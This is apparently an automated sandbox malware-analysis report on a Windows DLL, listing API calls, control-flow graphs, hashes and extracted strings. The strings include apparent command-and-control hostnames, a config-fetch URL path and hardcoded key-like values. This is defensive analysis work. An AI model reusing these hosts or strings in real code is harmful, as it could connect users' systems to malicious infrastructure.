                                                      • Sleep.KERNELBASE(000003E8), ref: 1001D69E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$Sleep$ErrorLast_memmoveclosesockethtonsinet_ntoarecvfromsendtosocket
                                                      • String ID: req$res
                                                      • API String ID: 3206013018-3551752921
                                                      • Opcode ID: 59a785be824b679cbb15ac01aa723ad3dce333656ced3cecef62665f76dcea99
                                                      • Instruction ID: f0e5c5a51288f6555a9495399a3376c632556063d47a78e4a63fd70f32be9dbf
                                                      • Opcode Fuzzy Hash: 59a785be824b679cbb15ac01aa723ad3dce333656ced3cecef62665f76dcea99
                                                      • Instruction Fuzzy Hash: 9B91D472108781AFE310EF24CC85BAABBE9EF49354F00461AF585CB1D1DB71E989CB52

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1026 1000dd2b-1000dd96 call 1004eb10 call 10039700 * 2 call 10033c98 1035 1000e029-1000e055 GetLastError call 1000c213 call 10035368 1026->1035 1036 1000dd9c-1000ddb9 call 10033eba 1026->1036 1045 1000e057-1000e05a 1035->1045 1046 1000e05c 1035->1046 1042 1000ddbc-1000ddc1 1036->1042 1042->1042 1044 1000ddc3-1000ddc8 1042->1044 1047 1000e005-1000e016 call 1000191f call 10001f26 1044->1047 1048 1000ddce-1000de13 1044->1048 1049 1000e05f-1000e090 call 10015c63 call 1000c266 call 10009643 call 1001c12c 1045->1049 1046->1049 1063 1000e01b-1000e024 call 10033fd2 1047->1063 1050 1000de34-1000de44 1048->1050 1051 1000de15-1000de32 call 10036dd0 1048->1051 1084 1000e095-1000e0a7 call 10004766 * 2 1049->1084 1056 1000de45-1000de48 1050->1056 1051->1056 1057 1000dea2-1000df78 call 10033afd call 100344ab call 10034410 call 100344ab call 10032fed call 1000191f call 10001f26 1056->1057 1058 1000de4a-1000de8c call 10001f26 1056->1058 1116 1000df7a-1000df7d 1057->1116 1117 1000dfdb 1057->1117 1071 1000de97-1000de9d call 10001d92 1058->1071 1072 1000de8e-1000de92 call 10001e92 1058->1072 1077 1000e0ac-1000e0b0 1063->1077 1071->1057 1072->1071 1081 1000e0b6-1000e0d2 call 10033c98 1077->1081 1082 1000e169 1077->1082 1094 1000e153-1000e164 call 1000191f call 10001f26 1081->1094 1095 1000e0d4-1000e0f8 call 10034410 call 10011419 1081->1095 1085 1000e16b-1000e183 call 10001d92 1082->1085 1084->1077 1094->1082 1109 1000e0fa 1095->1109 1110 1000e0fc-1000e100 1095->1110 1109->1110 1112 1000e102 1110->1112 1113 1000e104-1000e12c call 10032fed call 10001d92 1110->1113 1112->1113 1128 1000e12f-1000e134 1113->1128 1116->1117 1120 1000df7f-1000df82 1116->1120 1119 1000dfdd 1117->1119 1122 1000dfe0-1000dfe4 1119->1122 1120->1117 1123 1000df84-1000df9e call 10011419 1120->1123 1125 1000dff1-1000dff5 1122->1125 1126 1000dfe6-1000dfec call 10001d92 1122->1126 1133 1000dfa0 1123->1133 1134 1000dfa2 1123->1134 1125->1063 1131 1000dff7-1000e000 call 10033fd2 1125->1131 1126->1125 1128->1128 1132 1000e136-1000e151 call 10034adc call 10033fd2 1128->1132 1131->1085 1132->1082 1133->1134 1137 1000dfa8-1000dfac 1134->1137 1140 1000dfca-1000dfcf 1137->1140 1141 1000dfae-1000dfb0 1137->1141 1142 1000dfd1-1000dfd3 1140->1142 1144 1000dfb2-1000dfb8 1141->1144 1145 1000dfc4-1000dfc8 1141->1145 1142->1119 1147 1000dfd5-1000dfd9 1142->1147 1144->1140 1146 1000dfba-1000dfc2 1144->1146 1145->1142 1146->1137 1146->1145 1147->1122
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000DD30
                                                        • Part of subcall function 10033C98: __fsopen.LIBCMT ref: 10033CA3
                                                      • __fread_nolock.LIBCMT ref: 1000DDAB
                                                      • _memmove.LIBCMT ref: 1000DE27
                                                      • __localtime64.LIBCMT ref: 1000DEBE
                                                      • __time64.LIBCMT ref: 1000DEE7
                                                      • __localtime64.LIBCMT ref: 1000DEFF
                                                        • Part of subcall function 100344AB: __gmtime64_s.LIBCMT ref: 100344BE
                                                      • _sprintf.LIBCMT ref: 1000DF50
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • GetLastError.KERNEL32(?,?,?,10006588,?,00000000), ref: 1000E029
                                                      • __time64.LIBCMT ref: 1000E0D5
                                                      • _sprintf.LIBCMT ref: 1000E113
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog__localtime64__time64_sprintf$ErrorLast__fread_nolock__fsopen__gmtime64_s_memmove
                                                      • String ID: %d-%s-%s$File time update faild,can't create file.$O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s$time file is null
                                                      • API String ID: 1195966642-4095322339
                                                      • Opcode ID: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
                                                      • Instruction ID: 3c64a6cba0836d90df9f4256677c0f3f46e6d179118a5539ab0e8369d48d467e
                                                      • Opcode Fuzzy Hash: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
                                                      • Instruction Fuzzy Hash: D6D1B675D04249EFEB15DFA4CC91EEEB7B9EF05340F1040AAE509AB191DB31AE49CB60

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1149 1001e1a7-1001e1b8 1150 1001e1c2-1001e1c4 1149->1150 1151 1001e1ba-1001e1bf closesocket 1149->1151 1152 1001e1c6-1001e1ca closesocket 1150->1152 1153 1001e1cc-1001e1cf 1150->1153 1151->1150 1152->1153 1154 1001e1d1-1001e1d6 closesocket 1153->1154 1155 1001e1d9-1001e1ea 1153->1155 1154->1155 1156 1001e205-1001e208 1155->1156 1157 1001e1ec-1001e202 Sleep TerminateThread CloseHandle 1155->1157 1158 1001e223-1001e226 1156->1158 1159 1001e20a-1001e220 Sleep TerminateThread CloseHandle 1156->1159 1157->1156 1160 1001e241-1001e244 1158->1160 1161 1001e228-1001e23e Sleep TerminateThread CloseHandle 1158->1161 1159->1158 1162 1001e246-1001e25c Sleep TerminateThread CloseHandle 1160->1162 1163 1001e25f-1001e274 Sleep 1160->1163 1161->1160 1162->1163
                                                      APIs
                                                      • closesocket.WS2_32(?), ref: 1001E1BD
                                                      • closesocket.WS2_32(?), ref: 1001E1C8
                                                      • closesocket.WS2_32(?), ref: 1001E1D4
                                                      • Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                      • Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                      • TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                      • CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                      • Sleep.KERNELBASE ref: 1001E26F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$CloseHandleTerminateThread$closesocket
                                                      • String ID:
                                                      • API String ID: 3830272782-0
                                                      • Opcode ID: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
                                                      • Instruction ID: bc42b57c38fdf492546c018e19de88c484626926c77996ddfbf50983c1e4f3a2
                                                      • Opcode Fuzzy Hash: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
                                                      • Instruction Fuzzy Hash: 5121B830500B95AFD761AF36CC88B1ABBE5FF48749F11482DE186969A0D7B1E890CF14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1164 1000246e-10002550 call 1004eb10 call 1001a146 call 10001d63 call 1001a61c call 10001d92 call 10001e92 call 1001a65f call 10001d92 call 10001d63 call 10033afd call 10017a05 1325 10002552 call 1001a0f8 1164->1325 1326 10002552 call 1001a36c 1164->1326 1187 10002555-1000255d 1188 100028e2-10002900 WSAGetLastError call 1001a6bd 1187->1188 1189 10002563-10002756 call 1001a6bd call 1000191f call 10003256 call 1000191f call 10003256 call 1001a6bd call 10002f31 call 10001d92 call 1001a6a2 call 10002f31 call 10001d92 call 1000191f call 10003256 call 1000191f call 10003256 call 10001d63 call 10003078 call 100030ed call 10001d63 call 10017a82 call 10001d92 call 10001d63 * 2 call 10017a82 call 10001d63 * 2 call 10017a82 call 10017c93 call 10017cd2 call 10017bf7 1187->1189 1195 10002902 1188->1195 1196 10002904-10002913 call 1000191e 1188->1196 1273 10002778-1000278e call 1000191e 1189->1273 1274 10002758-1000275b 1189->1274 1195->1196 1202 10002919-10002922 call 10001d92 1196->1202 1208 10002924 1202->1208 1209 10002926-1000297a call 1000191e call 10017a55 call 10017a3a call 10001d92 call 1001a1ac call 10001d92 1202->1209 1208->1209 1275 10002791-100027a6 call 1000191f call 10001f26 1273->1275 1274->1275 1276 1000275d-1000276d call 10017bf7 1274->1276 1285 100028ae-100028b2 1275->1285 1282 10002772-10002776 1276->1282 1282->1273 1282->1274 1286 100028b8 1285->1286 1287 100027ab-100027b9 call 10002dbf 1285->1287 1288 100028c2-100028e0 call 10001d92 * 2 1286->1288 1292 1000286c-1000287a 1287->1292 1293 100027bf-100027f9 call 10002e39 call 100338d7 1287->1293 1288->1202 1297 100028aa-100028ac 1292->1297 1298 1000287c-1000288b 1292->1298 1307 100028ba-100028bd call 10001d92 1293->1307 1308 100027ff-10002801 1293->1308 1297->1285 1297->1288 1298->1297 1301 1000288d-1000289e call 10001db3 1298->1301 1301->1297 1306 100028a0-100028a5 call 10001e92 1301->1306 1306->1297 1307->1288 1308->1307 1311 10002807-10002852 call 10002e39 call 10002f31 call 10001d92 call 10001db3 1308->1311 1320 10002854-10002859 call 10001e92 1311->1320 1321 1000285e-1000286a call 10001d92 1311->1321 1320->1321 1321->1285 1325->1187 1326->1187
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002473
                                                        • Part of subcall function 1001A146: _malloc.LIBCMT ref: 1001A17E
                                                        • Part of subcall function 1001A61C: _wprintf.LIBCMT ref: 1001A640
                                                        • Part of subcall function 1001A65F: _wprintf.LIBCMT ref: 1001A683
                                                        • Part of subcall function 10033AFD: __wcstoi64.LIBCMT ref: 10033B10
                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,000000FF,00000000,?,?,?,?,00000001), ref: 100028E2
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                        • Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99
                                                        • Part of subcall function 10003078: __EH_prolog.LIBCMT ref: 1000307D
                                                        • Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
                                                        • Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4
                                                        • Part of subcall function 10017C93: _wprintf.LIBCMT ref: 10017CB7
                                                        • Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017CF2
                                                        • Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017D17
                                                        • Part of subcall function 10017BF7: _wprintf.LIBCMT ref: 10017C1D
                                                      • _swscanf.LIBCMT ref: 100027EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wprintf$H_prolog$_memmove$ErrorLast__wcstoi64_malloc_swscanf
                                                      • String ID: HTTP/1.1$ http://$%d bytes received %s $Accept$Content-type$GET$HTTP readBody data:%s$Host$application/x-www-form-urlencoded$text/plain
                                                      • API String ID: 1397112314-3476068429
                                                      • Opcode ID: 91028218de2b38da57e7cfe5cfe5cb8ebddedd6c49fd7cebcaafd1303919e32e
                                                      • Instruction ID: a7634ae425d1516add6669ffa0e6d985a436ae34248816d06a7b430fa3304256
                                                      • Opcode Fuzzy Hash: 91028218de2b38da57e7cfe5cfe5cb8ebddedd6c49fd7cebcaafd1303919e32e
                                                      • Instruction Fuzzy Hash: B1E1D235800258EEEB15DBA4CC96FEDB7B8EF11350F50409AE50A77186DF706B88CB62

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000E18B
                                                      • __time64.LIBCMT ref: 1000E1B1
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1000E1BE
                                                      • __time64.LIBCMT ref: 1000E1C7
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 1000E228
                                                        • Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473
                                                      • Sleep.KERNELBASE(niserr), ref: 1000E3FF
                                                      Strings
                                                      • /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld, xrefs: 1000E222
                                                      • niserr, xrefs: 1000E3ED
                                                      • api.5566331.com, xrefs: 1000E255
                                                      • hjh~$754jhghj, xrefs: 1000E31E
                                                      • Make Context:%s,time:%d,rand:%d, xrefs: 1000E427
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_rand_sprintf
                                                      • String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$Make Context:%s,time:%d,rand:%d$api.5566331.com$hjh~$754jhghj$niserr
                                                      • API String ID: 105401972-798844403
                                                      • Opcode ID: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
                                                      • Instruction ID: 49858955eb463be79c684a571caf072d61cc3a4debedbcbecd596b130e18948f
                                                      • Opcode Fuzzy Hash: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
                                                      • Instruction Fuzzy Hash: E8815D78C00249AEDB14DBA4CC91BEDB7B8EF14340F50849AE45A77156EF346B89CFA1

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 1000E7F8: ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000), ref: 1000E822
                                                        • Part of subcall function 1000E7F8: Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
                                                        • Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
                                                        • Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
                                                        • Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D
                                                      • Sleep.KERNELBASE(000003E8,?,?,?,1005ADE8,?,?,?,00000000), ref: 1000E62E
                                                        • Part of subcall function 1000DB5E: __EH_prolog.LIBCMT ref: 1000DB63
                                                        • Part of subcall function 1000DB5E: gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78
                                                      • Sleep.KERNEL32(000003E8), ref: 1000E68C
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
                                                        • Part of subcall function 1000DB5E: inet_addr.WS2_32(?), ref: 1000DC75
                                                      • CreateThread.KERNEL32(00000000,00000000,1000D124,?,00000000,00000000), ref: 1000E725
                                                      • CreateThread.KERNELBASE(00000000,00000000,1000D556,?,00000000,00000000), ref: 1000E767
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000D52D,?,00000000,00000000), ref: 1000E785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$inet_addr$CloseHandle_malloc$CreateSleepTerminate$H_prologMutexReleasegethostbyname
                                                      • String ID: Http GetSystem config is faild$[HOST] $[HOST]Today is has been running $config is faild$i$l
                                                      • API String ID: 1403256369-2250681267
                                                      • Opcode ID: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
                                                      • Instruction ID: 7789fda3e1e64cde54be39b73e63a15e1d5b9d6e7ac2d44710eacef3f7df3415
                                                      • Opcode Fuzzy Hash: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
                                                      • Instruction Fuzzy Hash: 9F71D7B5508781AFE310DF24CC84AAFBBE9EF88394F00091DF49A57295DB74AD44CB62
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000D5A8
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1000D691
                                                        • Part of subcall function 1003245C: std::exception::exception.LIBCMT ref: 10032472
                                                        • Part of subcall function 1003245C: __CxxThrowException@8.LIBCMT ref: 10032487
                                                      • _sprintf.LIBCMT ref: 1000D764
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,00000000,000000FF,?,?,?,?,10065258,00000000,0000000F,00000000), ref: 1000D7CC
                                                      • __time64.LIBCMT ref: 1000D809
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8H_prologInternal_throw_exceptionMutexThrow__time64_malloc_sprintfstd::exception::exception
                                                      • String ID: %s%s$ami.sh74lmy.com$jkdi%42&!#123
                                                      • API String ID: 3941556643-366288768
                                                      • Opcode ID: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
                                                      • Instruction ID: 694c5179693b881f44d76fd1f052d4137bf0354451c1df981b2dbb7ff4a16f9c
                                                      • Opcode Fuzzy Hash: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
                                                      • Instruction Fuzzy Hash: 1381F1B4801B459ED721CFBAC4917DAFBE4FF19300F90896ED1AE97242DB706644CB61
                                                      APIs
                                                      • ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000E822
                                                      • Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
                                                      • TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
                                                      • TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
                                                      • TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
                                                      • CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$TerminateThread$MutexReleaseSleep
                                                      • String ID:
                                                      • API String ID: 1937260624-0
                                                      • Opcode ID: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
                                                      • Instruction ID: 37b1b03ea3f2de3eb637aef0c1f15a50e86a627c4c476671b1db0ab1197ea950
                                                      • Opcode Fuzzy Hash: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
                                                      • Instruction Fuzzy Hash: 3B11D631600B44ABF760DB35CC84BEBB7E8EF48795F114829E1AEA61A0DB74AC448B54
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
